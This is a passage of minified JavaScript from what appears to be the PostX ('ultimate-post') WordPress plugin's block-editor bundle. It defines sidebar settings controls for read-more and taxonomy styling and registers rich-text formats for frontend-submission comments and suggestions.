Text","ultimate-post")},{type:"select",key:"readMoreIcon",label:__("Icon Style","ultimate-post"),svg:!0,options:[{value:"",label:__("None","ultimate-post"),icon:""},{value:"rightAngle",label:__("Angle","ultimate-post"),icon:"rightAngle"},{value:"rightAngle2",label:__("Arrow","ultimate-post"),icon:"rightAngle2"},{value:"rightArrowLg",label:__("Long Arrow","ultimate-post"),icon:"rightArrowLg"}]},{type:"typography",key:"readMoreTypo",label:__("Typography","ultimate-post")},{type:"range",key:"readMoreIconSize",min:0,max:80,step:1,responsive:!0,unit:!0,label:__("Icon Size","ultimate-post")},{type:"tab",key:"rmTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"readMoreColor",label:__("Color","ultimate-post")},{type:"color2",key:"readMoreBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"readMoreBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"readMoreRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"readMoreHoverColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"readMoreBgHoverColor",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"readMoreHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"readMoreHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]},{type:"dimension",key:"readMoreSacing",label:__("Spacing","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"readMorePadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],q=[{type:"select",key:"taxonomy",pro:!0,beside:!0,label:__("Taxonomy","ultimate-post"),options:[]},{type:"select",key:"catStyle",label:__("Taxonomy Style","ultimate-post"),options:[{value:"classic",label:__("Classic","ultimate-post")},{value:"borderLeft",label:__("Left Border","ultimate-post")},{value:"borderRight",label:__("Right Border","ultimate-post")},{value:"borderBoth",label:__("Both Side Border","ultimate-post")}]},{type:"select",key:"catPosition",label:__("Category Position","ultimate-post"),options:[{value:"aboveTitle",label:__("Above Title","ultimate-post")},{value:"topLeft",label:__("Over Image(Top Left)","ultimate-post")},{value:"topRight",label:__("Over Image(Top Right)","ultimate-post")},{value:"bottomLeft",label:__("Over Image(Bottom Left)","ultimate-post")},{value:"bottomRight",label:__("Over Image(Bottom Right)","ultimate-post")},{value:"centerCenter",label:__("Over Image(Center)","ultimate-post")}]},{type:"range",key:"catLineWidth",min:0,max:80,step:1,responsive:!0,label:__("Line Width","ultimate-post")},{type:"range",key:"catLineSpacing",min:0,max:100,step:1,responsive:!0,label:__("Line Spacing","ultimate-post")},{type:"typography",key:"catTypo",label:__("Typography","ultimate-post")},{type:"toggle",key:"customCatColor",label:__("Specific Color","ultimate-post"),pro:!0},{type:"linkbutton",key:"seperatorLink",placeholder:__("Link","ultimate-post"),label:__("Category Specific (Pro)","ultimate-post"),text:"Choose Color"},{type:"toggle",key:"onlyCatColor",label:__("Only Category Text Color (Pro)","ultimate-post")},{type:"tab",key:"cTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"catColor",label:__("Color","ultimate-post")},{type:"color2",key:"catBgColor",label:__("Background Color","ultimate-post")},{type:"color",key:"catLineColor",label:__("Line Color","ultimate-post")},{type:"border",key:"catBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"catHoverColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"catBgHoverColor",label:__("Hover Bg Color","ultimate-post")},{type:"color",key:"catLineHoverColor",label:__("Line Hover Color","ultimate-post")},{type:"border",key:"catHoverBorder",label:__("Hover Border","ultimate-post")}]}]},{type:"dimension",key:"catRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"catSacing",label:__("Spacing","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"catPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"range",key:"maxTaxonomy",min:0,max:150,step:1,label:__("Maximum Number of Taxonomy","ultimate-post")}]},5234:(e,t,l)=>{"use strict";l.d(t,{Z:()=>Y});var o=l(67294),a=l(20107),i=l(80118),n=l(69735),r=l(51579),s=l(48054),p=l(6766),c=l(65641),u=l(53613),d=l(26687),m=l(47484),g=l(45009),y=l(61187),b=l(77567),v=l(68477),h=l(41557),f=l(3248),k=l(69811),w=l(17024),x=l(3780),T=l(7928),_=l(86849),C=l(21525),E=l(81931),S=l(68073),P=l(22217),L=l(64390),I=l(42616),B=l(53956),U=l(34774),M=l(60405),A=l(7106),H=l(87025),N=l(59902),j=l(87763),Z=(l(65907),l(83100));const{__}=wp.i18n,{Fragment:O,useState:R,useRef:D,useEffect:z}=wp.element,{TextControl:F,TextareaControl:W,TabPanel:V,Tooltip:G,ToggleControl:q,Notice:$}=wp.components,K="https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=quick-query&utm_campaign=postx-dashboard#pricing",J=[{name:"settings",title:"Settings",icon:j.Z.settings3},{name:"style",title:"Style",icon:j.Z.style}],Y=e=>{const{title:t,initialOpen:l,pro:j,data:D,col:z,store:F,youtube:W,doc:Y,depend:X,hrIdx:Q=[],isToolbar:ee,isTab:te,tabData:le,tabs:oe=J,dynamicHelpText:ae}=e,[ie,ne]=(0,N.Z)(),[re,se]=R("no-section"),[pe,ce]=R(""),[ue,de]=R("settings"),me=(e,t,l,o,a)=>{const i=[...e.attributes[t]];return i[l][o]=a,i},ge=e=>te?(0,o.createElement)(V,{onSelect:e=>{(0,H.a2)(t,e),de(e)},initialTabName:(0,H.zC)(t),className:"ultp-accordion-tab ultp-settings-tab-field",tabs:oe},(t=>e(null,!0,!1,!1))):e();function ye(e){if("number"==typeof e)return F.attributes.dcFields[e]?.id;if("object"==typeof e){const{groupIdx:t,fieldIdx:l}=e;return F.attributes.dcFields[t].fields[l].id}}function be(e,t,l){const o=ye(e),a="number"==typeof e?"dcGroupStyles":"dcFieldStyles",i=wp.data.select("core/block-editor").getBlockAttributes(F.clientId),n={...F.attributes[a],[o]:{...i?.[a]?.default,...F.attributes[a][o],...null===t&&"object"==typeof l?l:{[t]:l}}};F.setAttributes({[a]:n})}const ve=(e,t=!0,l=!1,a=!0,N=!1)=>{const j=wp.blocks.getBlockType(F.name),Z=(e||D).filter((e=>!(!a&&!["separator","notice"].includes(e.type))||(te?le&&le[ue]&&le[ue].includes(e.key)||e.tab===ue:void 0)));return N||Q.forEach((e=>{te?e.tab===ue&&e.hr.forEach((e=>{e instanceof Object?e.idx&&e.idx<=Z.length&&Z.splice(e.idx,0,{type:"separator",label:e.label}):e&&e<=Z.length&&Z.splice(e,0,{type:"separator"})})):e<=Z.length&&Z.splice(e,0,{type:"separator"})})),Z.map(((e,a)=>{if(e&&e.disableIf&&e.disableIf(F.attributes))return;let N,Z=null;if(null!=e.dcIdx){const t=ye(e.dcIdx);F.attributes[e.dcParentKey][t]?.hasOwnProperty(e.key)?(N=F.attributes[e.dcParentKey][t][e.key],e.key2&&(Z=F.attributes[e.dcParentKey][t][e.key2])):(N=F.attributes[e.dcParentKey].default[e.key],e.key2&&(Z=F.attributes[e.dcParentKey].default[e.key2]))}else N=l?F.attributes[l.parent_id][l.block_id][e.key]:F.attributes[e.key],e.key2&&(Z=l?F.attributes[l.parent_id][l.block_id][e.key2]:F.attributes[e.key2]);if(!t||void 0===(!1===N||N)||!j.attributes[e.key].style||!1!==((e,t,l)=>{let o=!0,a="";return t.forEach(((t,l)=>{if(t?.hasOwnProperty("depends")){let l="";t.depends.forEach((t=>{"=="==t.condition?o="object"==typeof t.value?t.value.includes(e[t.key]):e[t.key]==t.value:"!="==t.condition?o="object"==typeof t.value?Array.isArray(t.value)?!t.value.includes(e[t.key]):!!e[t.key].lg:e[t.key]!=t.value:"MATCH_VALUE_ONLY"===t.condition&&(o=t.value===e[t.key]),""==l&&0==o&&(l="no")})),o="no"!=l}1==o&&""==a&&(a="yes")})),o="yes"==a,o})(F.attributes,j.attributes[e.key].style,e.key)){if("alignment"==e.type)return(0,o.createElement)(s.Z,{key:a,value:N,label:e.label,alignIcons:e.icons,responsive:e.responsive,disableJustify:e.disableJustify,device:ie,inline:e.inline,options:e.options,toolbar:e.toolbar,setDevice:e=>ne(e),onChange:t=>{null!=e.dcIdx?be(e.dcIdx,e.key,t):F.setAttributes({[e.key]:t})}});if("border"==e.type)return(0,o.createElement)(p.Z,{key:a,value:N,label:e.label,onChange:t=>F.setAttributes({[e.key]:t})});if("boxshadow"==e.type)return(0,o.createElement)(c.Z,{key:a,value:N,label:e.label,onChange:t=>F.setAttributes({[e.key]:t})});if("color"==e.type)return(0,o.createElement)(d.Z,{key:a,value:N,value2:Z,label:e.label,pro:e.pro,inline:e.inline,onChange:t=>{if(e.key2){const l=Array.isArray(t)?{...void 0!==t[0]?{[e.key]:t[0]}:{},...void 0!==t[1]?{[e.key2]:t[1]}:{}}:{[e.key]:t,[e.key2]:t};null!=e.dcIdx?be(e.dcIdx,null,l):F.setAttributes(l)}else null!=e.dcIdx?be(e.dcIdx,e.key,t):F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t})}});if("color2"==e.type)return(0,o.createElement)(m.Z,{key:a,value:N,clip:e.clip,label:e.label,pro:e.pro,image:e.image,video:e.video,extraClass:e.extraClass||"",customGradient:e.customGradient||[],onChange:t=>F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t})});if("divider"==e.type)return(0,o.createElement)(y.Z,{key:a,label:e.label});if("dimension"==e.type)return(0,o.createElement)(g.Z,{key:a,value:N,min:e.min,max:e.max,unit:e.unit,step:e.step,label:e.label,responsive:e.responsive,device:ie,setDevice:e=>ne(e),onChange:t=>F.setAttributes({[e.key]:t})});if("media"==e.type)return(0,o.createElement)(x.Z,{key:a,value:N,label:e.label,multiple:e.multiple,onChange:t=>F.setAttributes({[e.key]:t})});if("radioimage"==e.type)return(0,o.createElement)(_.Z,{key:a,value:N,label:e.label,isText:e.isText,options:e.options,onChange:t=>F.setAttributes({[e.key]:t})});if("range"==e.type){let t=N;if("queryNumPosts"==e.key&&JSON.stringify(F.attributes[e.key])==JSON.stringify(j.attributes[e.key].default)){const e=F.attributes.queryNumber,l=j.attributes.queryNumber.default;JSON.stringify(e)!=JSON.stringify(l)&&(t={lg:e,sm:e,xs:e},F.setAttributes({queryNumPosts:t}))}return(0,o.createElement)(C.Z,{key:a,metaKey:e.key,value:t,min:e.min,max:e.max,step:e.step,unit:e.unit,label:e.label,pro:e.pro,help:e.help,responsive:e.responsive,device:ie,clientId:e.clientId||"",updateChild:e.updateChild||!1,compact:e.compact,setDevice:e=>ne(e),onChange:t=>{null!=e.dcIdx?be(e.dcIdx,e.key,t):F.setAttributes({[e.key]:t})}})}if("select"==e.type){const t=N;if("queryType"==e.key){const e=F.attributes.queryInclude;e&&"[]"==F.attributes.queryCustomPosts&&"customPosts"!=N&&F.setAttributes({queryType:"customPosts",queryCustomPosts:JSON.stringify(e.split(",").map((e=>({value:e,title:e}))))})}let i=e.options;if("queryTax"==e.key||"queryTaxValue"==e.key||"filterType"==e.key||"filterValue"==e.key||"taxSlug"==e.key||"taxValue"==e.key||"taxonomy"==e.key){let t=[],l=localStorage.getItem("ultpTaxonomy");if(l=JSON.parse(l),"queryTax"==e.key||"filterType"==e.key||"taxonomy"==e.key)l?.hasOwnProperty(F.attributes.queryType)?(l=l[F.attributes.queryType],t=[{value:"",label:"- Select -"}],Object.keys(l).length>0&&(Object.keys(l).forEach((function(e){t.push({value:e,label:e})})),"queryTax"==e.key&&t.push({value:"multiTaxonomy",label:__("Multiple Taxonomy","ultimate-post"),pro:!0,link:K}))):"customPostType"==F.attributes.queryType?(t=[{value:"",label:"- Select -"}],l&&"object"==typeof l&&(Object.keys(l).forEach((function(e){const o=l[e];o&&"object"==typeof o&&Object.keys(o).forEach((function(e){t.some((t=>t.value===e))||t.push({value:e,label:e})}))})),t.push({value:"multiTaxonomy",label:__("Multiple Taxonomy","ultimate-post"),pro:!0,link:K}))):"customPostType"==F.attributes.queryType&&(t=[{value:"",label:"- Select -"}],l&&"object"==typeof l&&(Object.keys(l).forEach((function(e){const o=l[e];o&&"object"==typeof o&&Object.keys(o).forEach((function(e){t.some((t=>t.value===e))||t.push({value:e,label:e})}))})),t.push({value:"multiTaxonomy",label:__("Multiple Taxonomy","ultimate-post"),pro:!0,link:K})));else if("taxSlug"==e.key||"taxValue"==e.key)if("taxSlug"==e.key){const e=[];Object.keys(l).forEach((function(o){Object.keys(o).length>0&&Object.keys(l[o]).forEach((function(l){!1===e.includes(l)&&(t.push({value:l,label:l}),e.push(l))}))}))}else{const e=F.attributes.taxSlug;e&&Object.keys(l).forEach((function(o){l[o].hasOwnProperty(e)&&Object.keys(l[o][e]).forEach((function(e){t.push({value:e,label:e})}))}))}else if(l?.hasOwnProperty(F.attributes.queryType)&&(l=l[F.attributes.queryType],Object.keys(l).length>0)){const o="queryTaxValue"==e.key?"queryTax":"filterType",a=l[F.attributes[o]];void 0!==a&&(Array.isArray(a)||Object.keys(a).forEach((function(e){t.push({value:e,label:a[e]})})))}t.length>0&&(i=t)}const n=l?"":j.attributes[e.key];return(0,o.createElement)(P.Z,{key:a,keys:e.key,value:e.multiple?t?JSON.parse(t.replaceAll("u0022",'"')):[]:t,label:e.label,clear:e.clear,options:i,dynamicHelpText:ae,multiple:e.multiple,responsive:e.responsive,pro:e.pro,help:e.help,image:e.image,svg:e.svg||!1,svgClass:e.svgClass||"",condition:n?.condition||"",clientId:e.clientId||"",updateChild:e.updateChild||!1,device:ie,setDevice:e=>ne(e),beside:e.beside,defaultMedia:e.defaultMedia,onChange:t=>{void 0===n.condition?(e.multiple?F.setAttributes({[e.key]:JSON.stringify(t)}):F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t}),"queryTax"==e.key&&N!=t&&F.setAttributes({queryTaxValue:"[]"}),"filterType"==e.key&&N!=t&&F.setAttributes({filterValue:"[]"}),"taxSlug"==e.key&&N!=t&&F.setAttributes({taxValue:"[]"})):F.setAttributes(t)}})}if("tag"==e.type)return(0,o.createElement)(I.Z,{key:a,value:N,layoutCls:e.layoutCls,label:e.label,options:e.options,disabled:e.disabled,inline:e.inline,onChange:t=>F.setAttributes({[e.key]:t})});if("group"==e.type)return(0,o.createElement)(v.Z,{key:a,value:N,label:e.label,options:e.options,disabled:e.disabled,justify:e.justify,inline:e.inline,onChange:t=>F.setAttributes({[e.key]:t})});var R;if("text"==e.type)return(0,o.createElement)(U.Z,{key:a,value:N.replaceAll("&amp;","&"),isTextField:!0,attr:e,DC:null!==(R=e.DC)&&void 0!==R?R:null,onChange:t=>F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t})});if("number"==e.type)return(0,o.createElement)(T.Z,{key:a,value:N,min:e.min,max:e.max,unit:e.unit,step:e.step,label:e.label,responsive:e.responsive,device:ie,setDevice:e=>ne(e),onChange:t=>F.setAttributes({[e.key]:t})});if("textarea"==e.type)return(0,o.createElement)(U.Z,{key:a,value:N,isTextField:!1,attr:e,onChange:t=>F.setAttributes({[e.key]:t})});if("toggle"==e.type){let t=e.disabled,i=e.help,n=e.showDisabledValue;return F.attributes.advFilterEnable&&"paginationAjax"===e.key&&(t=!0,n=N,i=H.p2),(0,o.createElement)(M.Z,{key:a,value:N,label:e.label,pro:e.pro,disabled:t,showDisabledValue:n,clientId:e.clientId||"",updateChild:e.updateChild||!1,help:i,onChange:t=>{null!=e.dcIdx?be(e.dcIdx,e.key,t):F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t})}})}if("typography"==e.type)return(0,o.createElement)(A.Z,{key:a,value:N,label:e.label,device:ie,setDevice:e=>ne(e),onChange:t=>{null!=e.dcIdx?be(e.dcIdx,e.key,t):F.setAttributes({[e.key]:t})}});if("typography_toolbar"==e.type)return(0,o.createElement)(A.Z,{isToolbar:!0,key:a,value:N,label:e.label,device:ie,setDevice:e=>ne(e),onChange:t=>F.setAttributes({[e.key]:t})});if("tab"==e.type)return(0,o.createElement)(V,{key:a,tabs:e.content,activeClass:"active-tab",className:"ultp-field-wrap  ultp-tabs-field ultp-hover-tabs"},(e=>(0,o.createElement)(O,null,ve(e.options,!0,!1,!0,!0))));if("tab_toolbar"==e.type)return(0,o.createElement)(V,{key:a,tabs:e.content,className:"ultp-toolbar-tab"},(e=>(0,o.createElement)(O,null,ve(e.options,!0,!1,!0,!0))));if("toolbar_dropdown"==e.type)return(0,o.createElement)(i.Z,{key:a,options:e.options,value:N,onChange:t=>F.setAttributes({[e.key]:t}),label:e.label});if("checkbox"==e.type)return(0,o.createElement)(u.Z,{key:a,value:JSON.parse(N),label:e.label,options:e.options,onChange:t=>F.setAttributes({[e.key]:JSON.stringify(t)})});if("separator"==e.type)return(0,o.createElement)(L.Z,{key:a,label:e.label,fancy:e.fancy});if("linkbutton"==e.type){const{dcEnabled:t,dc:l}=F.attributes;return(0,o.createElement)(w.Z,{key:a,onlyLink:e.onlyLink,value:N,text:e.text,label:e.label,store:F,placeholder:e.placeholder,extraBtnAttr:e.extraBtnAttr,disableLink:(0,n.o6)()&&t&&l.linkEnabled,onChange:t=>F.setAttributes({[e.key]:t})})}if("template"==e.type)return(0,o.createElement)(B.Z,{key:a,label:e.label,store:F});if("layout"==e.type)return(0,o.createElement)(f.Z,{key:a,selector:e?.selector||"",value:N,label:e.label,col:z,pro:e.pro,tab:e.tab,block:e.block,options:e.options,onChange:t=>{if(e.variation&&t.layout){const l={};Object.keys(j.attributes).forEach(((t,o)=>{Object.keys((0,r.b)({})).includes(t)||(!e?.exclude?.includes(t)&&j.attributes[t].default?l[t]=j.attributes[t].default:l[t]=F?.attributes[t])})),F.setAttributes(e.variation?.hasOwnProperty(t.layout)?Object.assign({},l,{[e.key]:t.layout},e.variation[t.layout]):{[e.key]:t.layout})}else F.setAttributes(t)}});if("layout2"==e.type)return(0,o.createElement)(k.Z,{key:a,value:N,label:e.label,isInline:e.isInline,pro:e.pro,tab:e.tab,block:e.block,options:e.options,onChange:t=>{if(e.variation&&t.layout){const l={};Object.keys(j.attributes).forEach(((e,t)=>{Object.keys((0,r.b)({})).includes(e)||j.attributes[e].default&&(l[e]=j.attributes[e].default)})),F.setAttributes(e.variation?.hasOwnProperty(t.layout)?Object.assign({},l,{[e.key]:t.layout},e.variation[t.layout]):{[e.key]:t.layout})}else F.setAttributes(t)}});if("rowlayout"==e.type)return(0,o.createElement)(E.Z,{key:a,value:N,label:e.label,block:e.block,device:ie,setDevice:e=>ne(e),responsive:e.responsive,clientId:e.clientId,layout:e.layout,onChange:t=>{F.setAttributes({[e.key]:t})}});if("dynamicContent"===e.type)return ve(e.fields,!1);if("repetable"==e.type){const t=[...N],l={},i=e=>{l.start=e},n=e=>{l.stop=e},r=()=>{const o=t[l.start];t.splice(l.start,1),t.splice(l.stop,0,o),F.setAttributes({[e.key]:t})};return(0,o.createElement)("div",{key:a,className:"ultp-field-wrap ultp-field-sort"},e.label&&(0,o.createElement)("label",null,e.label),N.map(((l,a)=>{const s=a+1;return(0,o.createElement)("div",{key:a,className:`ultp-sort-items ${pe==s&&"active"}`,draggable:pe!=s,onDragStart:()=>i(a),onDragEnter:()=>n(a),onDragEnd:()=>r()},(0,o.createElement)("div",{className:"short-field-wrapper"},(0,o.createElement)("div",{className:"short-field-wrapper__control"},(0,o.createElement)("span",{className:"dashicons dashicons-move"})),(0,o.createElement)("div",{className:"short-field-label",onClick:()=>{ce(pe==s?"":s)}},(0,o.createElement)("div",{className:"short-field-wrapper__inside"},(0,o.createElement)("div",null,l.type)),(0,o.createElement)("span",{className:`ultp-short-collapse ${pe==s&&"active"}`,onClick:()=>{ce(pe==s?"":s)},type:"button"})),(0,o.createElement)("span",{onClick:()=>{t.splice(a,1),F.setAttributes({[e.key]:t})},className:"dashicons dashicons-no-alt ultp-sort-close"})),(0,o.createElement)("div",{className:`ultp-short-content ${pe==s&&"active"}`},ve(e.fields,!1,{parent_id:e.key,block_id:a})))})),(0,o.createElement)("button",{className:"ultp-sort-btn",onClick:()=>{const l={};Object.keys(j.attributes[e.key].fields).forEach((t=>{l[t]=j.attributes[e.key].fields[t].default})),t.push(l),F.setAttributes({[e.key]:t})}},(0,o.createElement)("span",{className:"dashicons dashicons-plus-alt2"})," ","Add New Fields"))}if("sort"==e.type){const t=[...N],l={},i=e=>{l.start=e},n=e=>{l.stop=e},r=()=>{const o=t[l.start];t.splice(l.start,1),t.splice(l.stop,0,o),F.setAttributes({[e.key]:t})};return(0,o.createElement)("div",{key:a,className:"ultp-field-wrap ultp-field-sort"},e.label&&(0,o.createElement)("label",null,e.label),N.map(((t,l)=>{const a=l+1;return(0,o.createElement)("div",{key:l,onDragStart:()=>i(l),onDragEnter:()=>n(l),onDragEnd:()=>r(),draggable:pe!=a,className:`ultp-sort-items ${pe==a&&"active"}`},(0,o.createElement)("div",{className:"short-field-wrapper"},(0,o.createElement)("div",{className:"short-field-wrapper__control"},(0,o.createElement)("span",{className:"dashicons dashicons-move"})),(0,o.createElement)("div",{className:"short-field-label",onClick:()=>{ce(pe==a?"":a)}},(0,o.createElement)("div",{className:"short-field-wrapper__inside"},(0,o.createElement)("div",null,e.options[t].label)),(0,o.createElement)("span",{className:`ultp-short-collapse ${pe==a&&"active"}`,onClick:()=>{ce(pe==a?"":a)},type:"button"})),e.options[t].action&&(0,o.createElement)("span",{onClick:()=>{F.setAttributes({[e.options[t].action]:!F.attributes[e.options[t].action]})},className:"dashicons ultp-sort-close dashicons-"+(F.attributes[e.options[t].action]?"visibility":"hidden")})),(0,o.createElement)("div",{className:`ultp-short-content ${pe==a&&"active"}`},ve(e.options[t].inner)))})))}if("search"==e.type){let t=[];N&&(0==N.indexOf("[{")?t=JSON.parse(N.replaceAll("u0022",'"')):0==N.indexOf("[")?JSON.parse(N).forEach((e=>{t.push({value:e,title:e})})):N.split(",").forEach((e=>{t.push({value:e,title:e})})));let l=e.pro;"queryPosts"==e.key&&"posts"==F.attributes.queryType&&(l=!F.attributes.queryInclude&&e.pro);let i="";switch(e.key){case"filterValue":i="###"+F.attributes.filterType;break;case"queryTaxValue":i=F.attributes.queryType+"###"+F.attributes.queryTax;break;case"queryExclude":case"queryExcludeTerm":i=F.attributes.queryType}let n=[];return"customPostType"==F.attributes.queryType&&(n=F.attributes?.queryPostType),(0,o.createElement)(S.Z,{key:a,value:t,pro:l,label:e.label,search:e.search,condition:i,postType:n,onChange:t=>F.setAttributes({[e.key]:JSON.stringify(t)})})}return"filter"==e.type?(0,o.createElement)(b.Z,{key:a,value:N,label:e.label,onChange:t=>F.setAttributes({[e.key]:t})}):"icon"==e.type?(0,o.createElement)(h.Z,{key:a,value:N,label:e.label,isSocial:e.isSocial,selection:e.selection,hideFilter:e.hideFilter,dynamicClass:e.dynamicClass,help:e.help,onChange:t=>F.setAttributes(l?{[l.parent_id]:me(F,l.parent_id,l.block_id,e.key,t)}:{[e.key]:t})}):"advFilterEnable"===e.type?(0,o.createElement)(M.Z,{key:a,value:N,onChange:t=>{t?(F.setAttributes({[e.key]:!0,filterShow:!1,paginationAjax:!0}),(0,H.Pm)(F.clientId,F.context["post-grid-parent/postBlockClientId"])):(F.setAttributes({[e.key]:!1}),(0,H.nn)(F.clientId))},label:"Enable Advanced Filter"}):"advPagiEnable"===e.type?(0,o.createElement)(M.Z,{key:a,value:N,onChange:t=>{t?(F.setAttributes({[e.key]:!0,paginationShow:!1}),(0,H.rl)(F.clientId,F.context["post-grid-parent/postBlockClientId"])):(F.setAttributes({[e.key]:!1}),(0,H.Vn)(F.clientId))},label:"Enable Advanced Pagination"}):"notice"===e.type?(0,o.createElement)($,{status:e.status,isDismissible:e.isDismissible||!1},e.text):void 0}}))},he=re==t||"inline"===t||"no-section"==re&&l,fe=t?.replace(/ /g,"-").toLowerCase();return(0,o.createElement)(O,null,t?(0,o.createElement)("div",{className:(0,a.Z)({"ultp-section-accordion":!0,"ultp-section-accordion-show":re==t,"ultp-tab-exist":te,"ultp-section-accordion-show":!!(re==t||"no-section"==re&&l)}),id:"ultp-sidebar-"+fe},"inline"!=t?(0,o.createElement)(O,null,(0,o.createElement)("div",{className:"ultp-section-accordion-item ultp-section-control",onClick:()=>se(re==t||"no-section"==re&&l?"":t)},(0,o.createElement)("span",{className:"ultp-section-control__help"},t,W&&(0,o.createElement)(G,{placement:"top",text:"Video Tutorials"},(0,o.createElement)("a",{onClick:e=>e.stopPropagation(),href:W,target:"_blank",rel:"noreferrer"},(0,o.createElement)("span",{className:"dashicons dashicons-youtube"}))),Y&&(0,o.createElement)(G,{placement:"top",text:"Documentation"},(0,o.createElement)("a",{onClick:e=>e.stopPropagation(),href:Y,target:"_blank",rel:"noreferrer"},(0,o.createElement)("span",{className:"ultp-section-control__docs dashicons dashicons-format-aside"})))),X&&(0,o.createElement)("span",{onClick:e=>e.stopPropagation(),className:"ultp-field-wrap ultp-field-toggle"},(0,o.createElement)(q,{__nextHasNoMarginBottom:!0,className:"ultp-section-control__toggle",checked:F.attributes[X],onChange:()=>F.setAttributes({[X]:!F.attributes[X]})})),re==t||"no-section"==re&&l?(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-arrow-up-alt2"}):(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-arrow-down-alt2"})),(0,o.createElement)("div",{className:(ee?"ultp-toolbar-section-show":"")+" ultp-section-show"+(re==t||"no-section"==re&&l?"":" is-hide")},j&&!ultp_data.active?(0,o.createElement)("div",{className:"ultp-pro-total"},(0,o.createElement)("div",{className:"ultp-section-pro-message"},(0,o.createElement)("span",null,__("Unlock It! Explore More","ultimate-post")," ",(0,o.createElement)("a",{href:(0,Z.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Pro Features","ultimate-post")))),he&&ge(ve)):he&&ge(ve))):(0,o.createElement)("div",{className:`ultp-section-show ${ee?"ultp-toolbar-section-show":""}\n\t\t\t\t\t\t\t`},he&&ge(ve))):(0,o.createElement)(O,null,D?ve(D):ve()))}},85556:(e,t,l)=>{"use strict";var o=l(67294),a=l(87763);l(41115);const{__}=wp.i18n,{BlockControls:i}=wp.blockEditor,{ToolbarButton:n,TextControl:r,Button:s,Dropdown:p}=wp.components,{useState:c}=wp.element,{registerFormatType:u,toggleFormat:d,applyFormat:m,removeFormat:g}=wp.richText;"true"==ultp_data.settings.ultp_frontend_submission&&(u("ultimate-post/fs-comment",{title:"Frontend Submission Comment",tagName:"span",className:"ultp-fs-has-comment",attributes:{data_fs_comment:"data-fs-comment"},edit:({isActive:e,value:t,onChange:l,activeAttributes:u})=>{const[g,y]=c("");return(0,o.createElement)(o.Fragment,null,"undefined"==typeof ultpFsSettings||u.data_fs_comment?(0,o.createElement)(i,null,(0,o.createElement)(p,{contentClassName:"ultp-cs-toolbar-comment",renderToggle:({onToggle:t})=>(0,o.createElement)(n,{onClick:()=>{t()},label:"Comment",className:"ultp-cs-toolbar-comment components-toolbar-group",icon:e?a.Z.fs_comment_selected:a.Z.fs_comment}),renderContent:({onToggle:e})=>(0,o.createElement)(o.Fragment,null,u&&u.data_fs_comment&&(0,o.createElement)("div",{className:"ultp-fs-comment-view__wrapper"},(0,o.createElement)("div",{className:"ultp-fs-comment-view"},(0,o.createElement)("div",{className:"ultp-fs-comment"},u.data_fs_comment),(0,o.createElement)(s,{className:"ultp-fs-comment-resolve",onClick:()=>{const o=d(t,{type:"ultimate-post/fs-comment",attributes:{comment:""}});l(o),e()},label:"Resolve Comment"}," ",__("Resolve Comment","ultimate-post")," "))),!(u&&u.data_fs_comment)&&(0,o.createElement)("div",{className:"ultp-fs-comment-input__wrapper"},(0,o.createElement)(r,{__nextHasNoMarginBottom:!0,label:"Enter Comment",value:g,className:"ultp-fs-comment-input",onChange:e=>y(e)}),(0,o.createElement)(s,{isPrimary:!0,className:"ultp-fs-comment-btn",onClick:()=>{(()=>{const e=m(t,{type:"ultimate-post/fs-comment",attributes:{data_fs_comment:g}});l(e)})(),e()}}," ",__("Add Comment","ultimate-post"))))})):"")}}),u("ultimate-post/fs-suggestion",{title:"Frontend Submission Suggestion",tagName:"span",className:"ultp-fs-has-suggestion",attributes:{data_fs_suggestion:"data-fs-suggestion"},edit:({isActive:e,value:t,onChange:l,activeAttributes:u,...d})=>{const[y,b]=c("");return(0,o.createElement)(o.Fragment,null,"undefined"==typeof ultpFsSettings||u.data_fs_suggestion?(0,o.createElement)(i,null,(0,o.createElement)(p,{contentClassName:"ultp-cs-toolbar-comment",renderToggle:({onToggle:t})=>(0,o.createElement)(n,{onClick:()=>{t()},label:"Suggestion",className:"ultp-cs-toolbar-comment components-toolbar-group",icon:e?a.Z.fs_suggestion_selected:a.Z.fs_suggestion}),renderContent:({onToggle:e})=>(0,o.createElement)(o.Fragment,null,u&&u.data_fs_suggestion&&(0,o.createElement)("div",{className:"ultp-fs-comment-view__wrapper"},(0,o.createElement)("div",{className:"ultp-fs-comment-view"},(0,o.createElement)("div",{className:"ultp-fs-comment"},u.data_fs_suggestion),(0,o.createElement)(s,{className:"ultp-fs-comment-resolve",onClick:()=>{g(t,{type:"ultimate-post/fs-suggestion",attributes:{data_fs_suggestion:""}}),u.fs_suggestion;const o=t.text.substring(0,t.start)+u.data_fs_suggestion+t.text.substring(t.end);l(wp.richText.create({text:o})),e()}}," ",__("Accept","ultimate-post")," 